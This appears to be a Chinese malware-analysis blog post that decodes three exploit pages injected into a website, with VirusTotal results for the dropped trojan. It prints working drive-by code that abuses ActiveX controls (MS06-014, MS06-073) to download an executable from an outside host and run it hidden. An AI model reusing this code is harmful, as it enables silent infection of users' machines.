透彻分析MS06-014+MS06-073+MS07-017智能网马挂马。文章是在breach那看到的,偶有点问题,想不清楚,等学好了再来分析下,文章很不错,看图就能知道!今天逛到http://www.fzlyl.cn/,发现被挂了好几个网马,想通知站长,却找不到联系地址,算了。经过测试发现,原来是MS06-014(MDAC RDS.DataSpace)+MS06-073+MS07-017(前段时间最流行的ANI光标漏洞)三个漏洞组合使用;下面的三个页面分别对应其中的不同利用方式。
挂了三个所谓的vip的加密网马,解密内容:
1、vip[1].htm
以下是代码片段:
<!-- vip[1].htm (decoded). Preserved verbatim for analysis - do not load this in a browser.
     The DIV's CSS cursor points at ah.c; the post attributes this to the MS07-017 (ANI
     cursor) exploit. The cursor file itself is not reproduced in the post, so the actual
     ANI payload cannot be checked here. -->
<DIV style="CURSOR: url(ah.c)"></DIV>
<!-- NOTE(review): document.write() called after the page has loaded implicitly reopens the
     document, so this onload handler replaces the page with an empty one; presumably this is
     meant to wipe the injected markup from view once the exploit has fired - confirm. -->
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
2、vip1[1].htm
以下是代码片段:
<!-- vip1[1].htm (decoded). Preserved verbatim for analysis - do not load this in a browser.
     The <noscript> iframe only matters when scripting is off; "src=*" is not a usable URL and
     looks like a placeholder (NOTE(review): unverified). The real payload is the script below. -->
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--
// A single writeln injects the whole inner script. When run as JScript it:
//   1. creates an <object> with classid BD96C556-65A3-11D0-983A-00C04FC29E36
//      (RDS.DataSpace, the control the post attributes to MS06-014);
//   2. uses that object's CreateObject() to obtain Microsoft.XMLHTTP and
//      ADODB.Stream - the ProgID is assembled from "Ado"+"db.St"+"ream",
//      presumably to evade signature matching on the literal string;
//   3. fetches g.exe from baobao3.slsbg.com (the leading "<" inside the URL
//      literal looks like an extraction artifact - NOTE(review): confirm) and
//      saves the response body to the relative file name "Microsoft.com"
//      (.com extension, so it is directly executable; the directory depends on
//      the browser's working directory);
//   4. launches it hidden via Shell.Application.ShellExecute(..., "open", 0).
// The "var d=1;" style statements are filler. The outer try/catch swallows
// every error, so on a patched browser the page shows nothing at all.
document.writeln("<script>var ailian,zhan;ailian=\"<http://baobao3.slsbg.com/g.exe\";zhan=\"Microsoft.com\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");var e=1;var xml=ado.CreateObject(\"Microsoft.XMLHTTP\",\"\");var f=1;var ln=\"Ado\";var lzn=\"db.St\";var an=\"ream\";var g=1;var as=ado.createobject(ln+lzn+an,\"\");var h=1;xml.Open(\"GET\",ailian,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(zhan,2);as.close();var shell=ado.createobject(\"Shell.Application\",\"\");shell.Shellexecute(zhan,\"\",\"\",\"open\",0);}catch(e){};</script\>");
//-->
</script>
<!-- NOTE(review): same post-load document.write("") as in vip[1].htm; it reopens and blanks
     the document, presumably to hide the injected content - confirm. -->
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
3、vip2[1].htm
以下是代码片段:
<!-- vip2[1].htm (decoded). Preserved verbatim for analysis - do not load this in a browser.
     The outer script writes an inner script line by line; the comments below describe the
     inner (generated) script. Compared with vip1[1].htm this variant tries a whole list of
     ActiveX controls and drops a VBScript launcher instead of calling ShellExecute directly. -->
<noscript>
<iframe src=*></iframe>
</noscript>
<script>
document.writeln("<script language=\"javaScript\">");
// Download URL, dropped file name (.com = executable), helper script name, and the
// RDS.DataSpace CLSID (MS06-014 per the post). All are written to %TEMP% later in Go().
document.writeln("ZhanLang=\"http://baobao3.slsbg.com/g.exe\"");
document.writeln("ZhanLang1=\"Microsoft.com\"");
document.writeln("ZhanLang2=\"Microsoft.vbs\"");
document.writeln("ln=\"BD96C556-65A3-11D0-983A-00C04FC29E36\"");
// Log(): creates a <p> that is never attached to the DOM and sets its innerHTML.
// Effectively a no-op; every call site passes ''. NOTE(review): purpose unclear
// (padding / timing / leftover debug hook) - do not mistake it for real logging.
document.writeln("function Log(QQ7999327)");
document.writeln("{");
document.writeln(" var log=document.createElement(\'p\');");
document.writeln(" log.innerHTML=QQ7999327;");
document.writeln("}");
// CreateO(o, n): tries six CreateObject/GetObject call shapes on control `o` for
// ProgID `n`, each wrapped in eval + an empty catch, and returns the first one that
// yields a non-null object (or null). This is the generic "abuse whatever control
// exposes CreateObject/GetObject" primitive the rest of the page is built on.
document.writeln("function CreateO(o,n)");
document.writeln("{");
document.writeln(" var r=null;");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if(!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.CreateObject(n,\"\",\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.GetObject(\"\",n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.GetObject(n,\"\")\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" if (!r)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" eval(\'r=o.GetObject(n)\')");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" return(r);");
document.writeln("}");
// Go(a): the download-and-execute stage, given a control `a` whose CreateObject works.
//   s  = WScript.Shell   ("WScript.S"+"hell" split to dodge string signatures)
//   o  = ADODB.Stream    (binary stream for the downloaded EXE)
//   ip = ADODB.Stream    (text stream for the VBScript launcher)
document.writeln("function Go(a)");
document.writeln("{");
document.writeln(" Log(\'\');");
document.writeln(" Zhong=\"WScript.S\";");
document.writeln(" ZhongJieZhe=Zhong;");
document.writeln(" var s=CreateO(a,ZhongJieZhe+\"hell\");");
document.writeln(" var o=CreateO(a,\"ADODB.Stream\");");
document.writeln(" var ip=CreateO(a,\"ADODB.Stream\");");
// Target paths are %TEMP%\Microsoft.com (payload) and %TEMP%\Microsoft.vbs (launcher),
// resolved through WScript.Shell's process environment.
document.writeln(" var e=s.Environment(\"Process\");");
document.writeln(" Log(\'\');");
document.writeln(" var url=ZhanLang;");
document.writeln(" var Lang=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang1;");
document.writeln(" var Zhan=e.Item(\"TEMP\")+\"\\\\\"+ZhanLang2;");
document.writeln(" var vip=null;");
document.writeln(" var kn;");
// The launcher is a three-line VBScript: create Wscript.Shell, Run the dropped
// payload path, release the object. Running the EXE through a .vbs adds one
// level of indirection between the browser and the payload process.
document.writeln(" kn=\"Set Shell = CreateObject(\\\"Wscript.Shell\\\")\";");
document.writeln(" kn=kn+\"\\n\"+\"Shell.Run(\\\"\"+Lang+\"\\\")\";");
document.writeln(" kn=kn+\"\\n\"+\"set Shell=Nothing\";");
// Write the launcher. Mode=3 is read/write; SaveToFile(...,2) overwrites.
// NOTE(review): "ip.WriteText=kn" is a property assignment, not a WriteText(kn) call -
// whether JScript/IDispatch actually writes the text this way is not verified here;
// the line is preserved exactly as found.
document.writeln(" ip.Mode=3;");
document.writeln(" ip.Open();");
document.writeln(" ip.Charset = \"GB2312\";");
document.writeln(" ip.Position = ip.Size;");
document.writeln(" ip.WriteText=kn;");
document.writeln(" ip.SaveToFile(Zhan,2);");
// HTTP client fallback chain: native XMLHttpRequest, then Microsoft.XMLHTTP,
// then MSXML2.ServerXMLHTTP. The last ActiveXObject call is not wrapped, so if
// all three fail the exception propagates to the caller's catch in Exploit().
document.writeln(" try");
document.writeln(" {");
document.writeln(" vip=new XMLHttpRequest();");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" vip=new ActiveXObject(\"Microsoft.XMLHTTP\");");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {");
document.writeln(" vip=new ActiveXObject(\"MSXML2.ServerXMLHTTP\");");
document.writeln(" }");
document.writeln(" }");
document.writeln(" if (!vip) return(0);");
document.writeln(" Log(\'\');");
// Synchronous GET of g.exe; responseBody is the raw bytes.
document.writeln(" vip.open(\"GET\",url,false);");
document.writeln(" vip.send(null);");
document.writeln(" kn=vip.responseBody;");
document.writeln(" Log(\'\');");
// Type=1 = adTypeBinary; write the bytes and save over %TEMP%\Microsoft.com.
document.writeln(" o.Type=1;");
document.writeln(" o.Mode=3;");
document.writeln(" o.Open();");
document.writeln(" o.Write(kn);");
document.writeln(" o.SaveToFile(Lang,2);");
document.writeln(" Log(\'\');");
// Run the .vbs launcher with window style 0 (hidden).
document.writeln(" s.Run(Zhan,0);");
document.writeln("}");
// Exploit(): walk a list of candidate controls until one yields a working
// WScript.Shell via CreateO(), then hand it to Go(). Brace-wrapped entries are
// instantiated as <object classid="clsid:..."> elements; anything else would go
// through new ActiveXObject(progid) (no such entries are present in this list).
// Notes on the list as printed:
//  - the first entry is the literal string '{ln}', not the `ln` variable, so it
//    produces an invalid classid and is effectively skipped;
//  - BD96C556-65A3-11D0-983A-00C04FC29E36 is RDS.DataSpace (MS06-014 per the post);
//  - 7F5B7F63-F06F-4331-8A26-339E03C0AE3D is presumably the WMI Object Broker
//    control covered by MS06-073 - NOTE(review): identify against a CLSID table;
//  - {6e32070a-766d-4ee6-879c-c1fa91d2fc3} has an 11-character last group and
//    cannot be a valid GUID as printed (likely truncated in copy/extraction);
//  - the remaining CLSIDs are not identified in the post.
document.writeln("function Exploit()");
document.writeln("{");
document.writeln(" var i=0;");
document.writeln(" var tt=new Array(\'{ln}\',\'{BD96C556-65A3-11D0-983A-00C04FC29E36}\',\'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}\',\'{0006F033-0000-0000-C000-000000000046}\',\'{0006F03A-0000-0000-C000-000000000046}\',\'{6e32070a-766d-4ee6-879c-c1fa91d2fc3}\',\'{6414512B-B978-451D-A0D8-FCFDF33E833C}\',\'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}\',\'{06723E09-F4C2-43c8-8358-09FCD1DB0766}\',\'{639F725F-1B2D-4831-A9FD-874847682010}\',\'{BA018599-1DB3-44f9-83B4-461454C84BF8}\',\'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}\',\'{E8CCCDDF-CA28-496b-B050-6C07C962476B}\',null);");
document.writeln("while (true)");
// NOTE(review): "t=tt;" assigns the whole array, so t==null is never true and
// t.substring() throws a TypeError on the first pass, which escapes Exploit()
// (the throw is outside the inner try blocks). Together with the `i++` below,
// the original was almost certainly "t=tt[i];" and the "[i]" was lost when the
// post was rendered. As printed, this listing does not run to Go().
document.writeln(" { t=tt;");
document.writeln(" if (t==null)");
document.writeln(" {");
document.writeln(" return(0);");
document.writeln(" }");
document.writeln(" var a=null;");
document.writeln(" if (t.substring(0,1)==\'{\')");
document.writeln(" {");
document.writeln(" try{");
document.writeln(" a=document.createElement(\"object\");");
document.writeln(" a.setAttribute(\"classid\",\"clsid:\"+t.substring(1,t.length-1));");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" else");
document.writeln(" {");
document.writeln(" try{");
document.writeln(" a=new ActiveXObject(t);");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
// createElement("object") succeeds even for an unknown classid, so `a` is
// non-null for every brace entry; the real filter is whether CreateO() can
// get WScript.Shell out of it. First success runs Go() and stops.
document.writeln(" if (a)");
document.writeln(" {");
document.writeln(" try");
document.writeln(" {");
document.writeln(" var b=CreateO(a,\"WScript.Shell\");");
document.writeln(" if (b)");
document.writeln(" {");
document.writeln(" Log(\'\');");
document.writeln(" Go(a);");
document.writeln(" return(0);");
document.writeln(" }");
document.writeln(" }");
document.writeln(" catch(e)");
document.writeln(" {}");
document.writeln(" }");
document.writeln(" i++;");
document.writeln(" }");
document.writeln(" Log(\'\');");
document.writeln("}");
document.writeln(" Exploit()");
document.writeln("");
document.writeln("<\/script>");
</script>
<!-- NOTE(review): same post-load document.write("") as in the other two pages; it reopens
     and blanks the document, presumably to hide the injected content - confirm. -->
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
将下载到的木马 g[1].exe 上传到 http://www.virustotal.com/en/indexf.html 扫描,得到如下结果(扫描日期为 2007-05-30/31):
Antivirus Version Update Result
AhnLab-V3 2007.5.30.0 05.30.2007 Win-Trojan/Hupigon.Gen
AntiVir 7.4.0.29 05.30.2007 HEUR/Malware
Authentium 4.93.8 05.23.2007 could be infected with an unknown virus
Avast 4.7.997.0 05.30.2007 no virus found
AVG 7.5.0.467 05.30.2007 no virus found
BitDefender 7.2 05.31.2007 BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal 9.00 05.30.2007 no virus found
ClamAV devel-20070416 05.30.2007 no virus found
DrWeb 4.33 05.30.2007 DLOADER.Trojan
eSafe 7.0.15.0 05.30.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3678 05.30.2007 no virus found
Ewido 4.0 05.29.2007 no virus found
FileAdvisor 1 05.31.2007 no virus found
Fortinet 2.85.0.0 05.31.2007 no virus found
F-Prot 4.3.2.48 05.30.2007 no virus found
F-Secure 6.70.13030.0 05.30.2007 no virus found
Ikarus T3.1.1.8 05.30.2007 Trojan.Win32.Delf.vb
Kaspersky 4.0.2.24 05.31.2007 no virus found
McAfee 5042 05.30.2007 no virus found
Microsoft 1.2503 05.31.2007 no virus found
NOD32v2 2299 05.30.2007 probably a variant of Win32/Genetik
Norman 5.80.02 05.30.2007 no virus found
Panda 9.0.0.4 05.30.2007 Suspicious file
Prevx1 V2 05.31.2007 no virus found
Sophos 4.18.0 05.28.2007 no virus found
Sunbelt 2.2.907.0 05.30.2007 no virus found
Symantec 10 05.31.2007 no virus found
TheHacker 6.1.6.126 05.30.2007 no virus found
VBA32 3.12.0 05.30.2007 suspected of Backdoor.GrayBird.1 (paranoid heuristics)
VirusBuster 4.3.23:9 05.30.2007 no virus found
Webwasher-Gateway 6.0.1 05.31.2007 Heuristic.Malware
能过Kaspersky、McAfee、AVG等杀毒软件,看来还是做了些免杀处理的。需要注意:上表只是 2007-05-30 前后的一次快照,报毒的引擎里多数也只是启发式或行为类判定(HEUR、BehavesLike、Suspicious、paranoid heuristics),"no virus found"不等于文件无害;文中没有给出样本的 MD5/SHA1,后来者无法据此复核或重新提交扫描。